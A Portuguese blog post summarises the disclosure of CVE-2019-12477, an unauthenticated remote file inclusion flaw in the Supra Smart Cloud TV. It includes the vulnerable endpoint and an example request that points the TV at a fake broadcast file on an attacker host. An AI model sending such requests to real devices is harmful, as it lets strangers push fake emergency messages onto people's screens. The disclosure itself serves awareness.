top of page

Descoberta falha de inclusão remota de ficheiro na Supra Smart Cloud TV

  • Foto do escritor: zecorreia93
    zecorreia93
  • 3 de jun. de 2019
  • 1 min de leitura

Este modelo de smartTV permite incluir qualquer tipo de ficheiro remotamente através de uma função designada por "openLiveURL", a qual permite que um atacante consiga fazer broadcast de um vídeo falso sem qualquer tipo de autenticação. Esta falha é dada pelo CVE 2019-12477.

O diretório específico que está vulnerável a esta falha é:

/remote/media_control?action=setUri&uri=URI

Esta falha está também visível a partir do código-fonte, portanto através de uma inspeção cuidada do mesmo, é possível verificar que os pedidos feitos a este parâmetro podem ser alterados e executar a falha.

Tudo o que o atacante precisa de fazer é enviar um pedido especial ao url citado, por exemplo, http://xx.xx.xx.xx/remote//media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Apesar de o URL aceitar o formato .m3u8, tudo o que o atacante precisa de fazer é um pedido através do programa cURL, como por exemplo "curl --v -X GET". Este comando irá fazer essencialmente com o que o cliente faça um pedido "GET" a esse recurso web, não precisando de autenticação para tal. Em termos de impacto, o que o atacante pode fazer é simular uma mensagem de emergência.

Não existe ainda solução para este problema, mas espera-se que a marca lance uma correção durante as próximas semanas.

Mais informações aqui: https://www.inputzero.io/2019/06/hacking-smart-tv.html

Comments


POSTS RECENTES:
PROCURE POR TAGS:
bottom of page